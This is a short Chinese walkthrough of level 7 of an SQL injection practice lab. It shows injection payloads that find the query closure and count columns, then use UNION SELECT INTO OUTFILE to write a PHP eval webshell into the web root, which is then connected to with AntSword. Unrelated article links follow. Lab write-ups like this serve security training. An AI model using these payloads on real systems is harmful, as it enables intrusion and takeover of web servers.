SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

二.判断列数

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常,说明有3列

这里显示让我们用outfile来打这关,那我们先了解一下outfile:

用法:select 列名 from table [where语句] into outfile '目标文件'

三.写入木马文件

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后,就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了,我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略

相关推荐
NuyoahC1 小时前
MySQL 表的内连和外连
数据库·mysql
后端研发Marion2 小时前
【DB-GPT】开启数据库交互新篇章的技术探索与实践
数据库·gpt
2401_884810744 小时前
MySQL视图笔记
数据库·笔记·mysql
Q_27437851094 小时前
django基于Python的校园个人闲置物品换购平台
java·数据库·python·django
程序员谷美5 小时前
Mysql 性能优化:覆盖索引
数据库·mysql·索引
余识-5 小时前
16.C语言预处理指令详解:#define、#include、#ifdef 等高效用法
c语言·数据库
焱焱枫6 小时前
Oracle 23ai新特性:表值构造函数
数据库·oracle·新特性·表值构造函数·oracle 23ai
weisian1516 小时前
Mysql--运维篇--库表分离(垂直分库,水平分库,垂直分表,水平分表)
运维·数据库·mysql
Elastic 中国社区官方博客7 小时前
Elasticsearch:在 HNSW 中提前终止以实现更快的近似 KNN 搜索
大数据·数据库·人工智能·elasticsearch·搜索引擎·ai·全文检索
ThisIsClark7 小时前
【后端面试总结】ES和MySQL对比技术探讨
mysql·elasticsearch·面试